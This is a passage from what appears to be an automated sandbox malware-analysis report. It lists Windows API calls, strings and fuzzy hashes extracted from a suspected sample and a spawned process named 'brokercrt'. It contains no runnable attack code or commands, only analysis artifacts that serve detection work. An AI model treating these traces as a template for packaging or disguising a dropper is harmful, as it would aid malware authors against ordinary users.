                  • API ID: ItemText$DialogWindow
                  • String ID: GETPASSWORD1
                  • API String ID: 445417207-3292211884
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _swprintf.LIBCMT ref: 00F3B51E
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • _wcschr.LIBVCRUNTIME ref: 00F3B53C
                  • _wcschr.LIBVCRUNTIME ref: 00F3B54C
                  Strings
                  Similarity
                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                  • String ID: %c:\
                  • API String ID: 525462905-3142399695
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F3ABC5,00000008,?,00000000,?,00F3CB88,?,00000000), ref: 00F406F3
                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F3ABC5,00000008,?,00000000,?,00F3CB88,?,00000000), ref: 00F406FD
                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F3ABC5,00000008,?,00000000,?,00F3CB88,?,00000000), ref: 00F4070D
                  Strings
                  • Thread pool initialization failed., xrefs: 00F40725
                  Similarity
                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                  • String ID: Thread pool initialization failed.
                  • API String ID: 3340455307-2182114853
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Similarity
                  • API ID:
                  • String ID: RENAMEDLG$REPLACEFILEDLG
                  • API String ID: 0-56093855
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00F380B7,?,?,?), ref: 00F3A351
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00F380B7,?,?), ref: 00F3A395
                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00F380B7,?,?,?,?,?,?,?,?), ref: 00F3A416
                  • CloseHandle.KERNEL32(?,?,00000000,?,00F380B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00F3A41D
                  Similarity
                  • API ID: File$Create$CloseHandleTime
                  • String ID:
                  • API String ID: 2287278272-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00F589AD,?,00000000,?,00000001,?,?,00000001,00F589AD,?), ref: 00F5C0E6
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F5C16F
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F567E2,?), ref: 00F5C181
                  • __freea.LIBCMT ref: 00F5C18A
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00F5251A
                    • Part of subcall function 00F52B52: ___AdjustPointer.LIBCMT ref: 00F52B9C
                  • _UnwindNestedFrames.LIBCMT ref: 00F52531
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00F52543
                  • CallCatchBlock.LIBVCRUNTIME ref: 00F52567
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetDC.USER32(00000000), ref: 00F49DBE
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F49DCD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F49DDB
                  • ReleaseDC.USER32(00000000,00000000), ref: 00F49DE9
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00F52016
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00F5201B
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00F52020
                    • Part of subcall function 00F5310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00F5311F
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00F52035
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F49DF1: GetDC.USER32(00000000), ref: 00F49DF5
                    • Part of subcall function 00F49DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F49E00
                    • Part of subcall function 00F49DF1: ReleaseDC.USER32(00000000,00000000), ref: 00F49E0B
                  • GetObjectW.GDI32(?,00000018,?), ref: 00F49F8D
                    • Part of subcall function 00F4A1E5: GetDC.USER32(00000000), ref: 00F4A1EE
                    • Part of subcall function 00F4A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00F4A21D
                    • Part of subcall function 00F4A1E5: ReleaseDC.USER32(00000000,?), ref: 00F4A2B5
                  Strings
                  Similarity
                  • API ID: ObjectRelease$CapsDevice
                  • String ID: (
                  • API String ID: 1061551593-3887548279
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Similarity
                  • API ID: _swprintf
                  • String ID: %ls$%s: %s
                  • API String ID: 589789837-2259941744
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _free.LIBCMT ref: 00F5AA84
                    • Part of subcall function 00F58849: IsProcessorFeaturePresent.KERNEL32(00000017,00F58838,00000050,00F63958,?,00F3CFE0,00000004,00F70EE8,?,?,00F58845,00000000,00000000,00000000,00000000,00000000), ref: 00F5884B
                    • Part of subcall function 00F58849: GetCurrentProcess.KERNEL32(C0000417,00F63958,00000050,00F70EE8), ref: 00F5886D
                    • Part of subcall function 00F58849: TerminateProcess.KERNEL32(00000000), ref: 00F58874
                  Strings
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                  • String ID: *?$.
                  • API String ID: 2667617558-3972193922
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F37730
                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F378CC
                    • Part of subcall function 00F3A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A458
                    • Part of subcall function 00F3A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A489
                  Strings
                  Similarity
                  • API ID: File$Attributes$H_prologTime
                  • String ID: :
                  • API String ID: 1861295151-336475711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Similarity
                  • API ID:
                  • String ID: UNC$\\?\
                  • API String ID: 0-253988292
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Similarity
                  • API ID:
                  • String ID: Shell.Explorer$about:blank
                  • API String ID: 0-874089819
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F3EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F3EB92
                    • Part of subcall function 00F3EB73: GetProcAddress.KERNEL32(00F781C0,CryptUnprotectMemory), ref: 00F3EBA2
                  • GetCurrentProcessId.KERNEL32(?,?,?,00F3EBEC), ref: 00F3EC84
                  Strings
                  • CryptProtectMemory failed, xrefs: 00F3EC3B
                  • CryptUnprotectMemory failed, xrefs: 00F3EC7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressProc$CurrentProcess
                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                  • API String ID: 2190909847-396321323
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateThread.KERNEL32(00000000,00010000,00F409D0,?,00000000,00000000), ref: 00F408AD
                  • SetThreadPriority.KERNEL32(?,00000000), ref: 00F408F4
                    • Part of subcall function 00F36E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F36EAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Thread$CreatePriority__vswprintf_c_l
                  • String ID: CreateThread failed
                  • API String ID: 2655393344-3849766595
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F3DA98: _swprintf.LIBCMT ref: 00F3DABE
                    • Part of subcall function 00F3DA98: _strlen.LIBCMT ref: 00F3DADF
                    • Part of subcall function 00F3DA98: SetDlgItemTextW.USER32(?,00F6E154,?), ref: 00F3DB3F
                    • Part of subcall function 00F3DA98: GetWindowRect.USER32(?,?), ref: 00F3DB79
                    • Part of subcall function 00F3DA98: GetClientRect.USER32(?,?), ref: 00F3DB85
                  • GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                  • SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                  • String ID: 0
                  • API String ID: 2622349952-4108050209
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00F40A78,?), ref: 00F40854
                  • GetLastError.KERNEL32(?), ref: 00F40860
                    • Part of subcall function 00F36E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F36EAF
                  Strings
                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F40869
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                  • API String ID: 1091760877-2248577382
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,00F3D32F,?), ref: 00F3DA53
                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F3D32F,?), ref: 00F3DA61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FindHandleModuleResource
                  • String ID: RTL
                  • API String ID: 3537982541-834975271
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID: >O_^
                  • API String ID: 0-4219905819
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07a39b321504490cdc2cd26eb9df6dcdda2d4bff2d3c46de7890b98eb2ff28e9
                  • Instruction ID: 9a61a34b0f9c3b40365082e2011997154aa28a5226ee31d9bc59859a740aa280
                  • Opcode Fuzzy Hash: 07a39b321504490cdc2cd26eb9df6dcdda2d4bff2d3c46de7890b98eb2ff28e9
                  • Instruction Fuzzy Hash: E8D12631D1961ACFEBA8EB68D4947BDB7B1FF99341F5000B9D40EA3292CB396841CB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d3d525cee2eca1011c94315644010eb2ff3719e70fa834c8d78533ddaf7f67ed
                  • Instruction ID: df8558e3e4f6d65488a6742024c0d8e2676fe66b99b5ff84d444d4ac52b2c837
                  • Opcode Fuzzy Hash: d3d525cee2eca1011c94315644010eb2ff3719e70fa834c8d78533ddaf7f67ed
                  • Instruction Fuzzy Hash: B581AC31A1CA9A8FDB58EF1888516A977E2FF99744F14057EE44DC32C2CE34AC42C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aa62f4bdc8247f01d80521694b7fb633cd66b791e7eafa03fe0a54f799806a39
                  • Instruction ID: b14098f6bcbe0a335a2ced0fd894f3a090983a7bd3874de8cc7d8bbe0752a841
                  • Opcode Fuzzy Hash: aa62f4bdc8247f01d80521694b7fb633cd66b791e7eafa03fe0a54f799806a39
                  • Instruction Fuzzy Hash: 7951AB31A1CA9A8FDB49EF1888655AA77E2FB98344F14457ED44AC32C2DF34AC42C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df65b39571ffb31eff9a53b902ca33793deca91a603ddf9ded7421dbcb55a12a
                  • Instruction ID: 4e97c6dbd6c340924ed19d894806fac7674c65567473fa94c205f9a9e19220cf
                  • Opcode Fuzzy Hash: df65b39571ffb31eff9a53b902ca33793deca91a603ddf9ded7421dbcb55a12a
                  • Instruction Fuzzy Hash: D3510730D1891D8FEF98EBA8E859ABDB7F1FB58355F40017AD00DE3295DB35A8818B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aeeab1d6cf2c7074bf6f083926c457a9d008c0507dc10e87b72f2826a66012d7
                  • Instruction ID: 02e949aaabddbfb2094ec18fcd50db4cd42625feb6ab56a2b475b0d376dfbb33
                  • Opcode Fuzzy Hash: aeeab1d6cf2c7074bf6f083926c457a9d008c0507dc10e87b72f2826a66012d7
                  • Instruction Fuzzy Hash: 63511370D0D65E8EEB94EBA8D4986EDBBF1EF58340F50017AD049E72D2DB386984CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a0217f1c85081db6138a9b8693bbf6304612e7429a587d53b985c34cac40cea
                  • Instruction ID: d7f689c14e7430f8ec5d06e76864bc2c809724477ab4ea2f23475c2f8985e46e
                  • Opcode Fuzzy Hash: 8a0217f1c85081db6138a9b8693bbf6304612e7429a587d53b985c34cac40cea
                  • Instruction Fuzzy Hash: 2F412731A0DA8A4FE355EBB898951B9FBE0EF8A390F0541BBD40DD31D2DF28AC418355
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8ed3deb320ff9077a3bbb031e5a767d9b8d65aac1a6f7f270bc2c34d0f3f082
                  • Instruction ID: 9200a57188413271b39b6c3d2cb4af1ac484e09b3ae2422c3be8a265bd9d70c7
                  • Opcode Fuzzy Hash: b8ed3deb320ff9077a3bbb031e5a767d9b8d65aac1a6f7f270bc2c34d0f3f082
                  • Instruction Fuzzy Hash: E5417971E1D94A9FEB85EB6CD8596B9BBE0FF59350F4400BAD04ED32D2DF2868018B14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4be4e0e46f6622d005a4155b916c2042bf3e834e0eafa8dad8237e7049341ddb
                  • Instruction ID: d4aa1a6b9dbb3136f56b7289676d93f9b058cdde561e15ffb3694ee13848c308
                  • Opcode Fuzzy Hash: 4be4e0e46f6622d005a4155b916c2042bf3e834e0eafa8dad8237e7049341ddb
                  • Instruction Fuzzy Hash: 7F41A031D1D6868FE702AB7848191B97FA0FF16740F0805BBC459D71D3EB28A9498359
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ec56e9965381ff02d002b096469c66133189588fc54943b79733df7052fa4b7
                  • Instruction ID: d4ac8c0e8188853ab05f0864fbb78d33633ab4c952f094bed16a6c3b44887d9c
                  • Opcode Fuzzy Hash: 7ec56e9965381ff02d002b096469c66133189588fc54943b79733df7052fa4b7
                  • Instruction Fuzzy Hash: DE31E231A0D65A9FE712FBA8A8885E9B7E0EF45351F0545B3D40CCB0A3DF38A48483A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 534fb0448e5a974af19b96c6803466e15a3726bb8a4ccc55ad3c4adfdf077971
                  • Instruction ID: e07ff60d20b550a9fcb841900750e1294dd5f367b4e9739fc67d8c4944f741d1
                  • Opcode Fuzzy Hash: 534fb0448e5a974af19b96c6803466e15a3726bb8a4ccc55ad3c4adfdf077971
                  • Instruction Fuzzy Hash: B2216631E1D6498EEB49EBA4E8256FDBBB1FF58351F10017AD00AE32C2DF3828458B15
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40fcfe94e2a58a2aeb41ae3162efdfbd0d5a04e6579fd81f31f51d01494452f
                  • Instruction ID: fa0bb08e9aa91f08223adb57bd6d589720542cfc21a8eac91768fd224a323ec0
                  • Opcode Fuzzy Hash: c40fcfe94e2a58a2aeb41ae3162efdfbd0d5a04e6579fd81f31f51d01494452f
                  • Instruction Fuzzy Hash: 48214731D0C52A8EEB14FB94D841BFDB3A0EF91390F001279D41EA31D1EF38AD548A58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b232192c02307b7f595c5ffab4fd18f0cef0db367016dde1f8e9fade28e4fd1
                  • Instruction ID: 3596779cabaaab10775e8e6da01d77fcca8972b63098fb89f0ac408124b2f987
                  • Opcode Fuzzy Hash: 4b232192c02307b7f595c5ffab4fd18f0cef0db367016dde1f8e9fade28e4fd1
                  • Instruction Fuzzy Hash: 8A21903084D78A9FE743EB7888585A97FF0FF1A350F0904FBD485CB0A2DA289945C725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62aaf18e1dbb4326439dd9b53dc1fb391b2245b38451efc7bbe140b82a1ca40a
                  • Instruction ID: a6c2ab4b15adf42d7990356f394614fa417093ff4e0abedc8cfb4224bbefeaa1
                  • Opcode Fuzzy Hash: 62aaf18e1dbb4326439dd9b53dc1fb391b2245b38451efc7bbe140b82a1ca40a
                  • Instruction Fuzzy Hash: CD116A31D0C55E9EE780FB68D8492B97BE0FF98380F4405B6D809C6192EF38A9448740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 765eb34e8f347c69b29e6047a71357a126399705434d46f64a9ad1da230dc60f
                  • Instruction ID: 1535ac52a20decb38073eb6994a405726c7f632ce073feb40d94fd32b9eaadcc
                  • Opcode Fuzzy Hash: 765eb34e8f347c69b29e6047a71357a126399705434d46f64a9ad1da230dc60f
                  • Instruction Fuzzy Hash: 56118B31A0D9098FEB48DF68E8283AA7AE1EB85325F50007ED10AD36D6CFF914158B40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3cf85a2dfcd76bef3fe78a1cd55e892e94e39a5489ac3beb7dffd1a5bca685e5
                  • Instruction ID: bb36f012e39554129503c0ec4ae2968079b5c9fcf1567be8f77566576f04112a
                  • Opcode Fuzzy Hash: 3cf85a2dfcd76bef3fe78a1cd55e892e94e39a5489ac3beb7dffd1a5bca685e5
                  • Instruction Fuzzy Hash: 34118E3090C68E8FEB4AEF68C4992B97BA0FF18341F4404BAD41AC71D1EF39A950C704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e528d7f5b69a1683d1d711a45abfc70e44ee4a49df1fe73b52fe1dde58cf6d7c
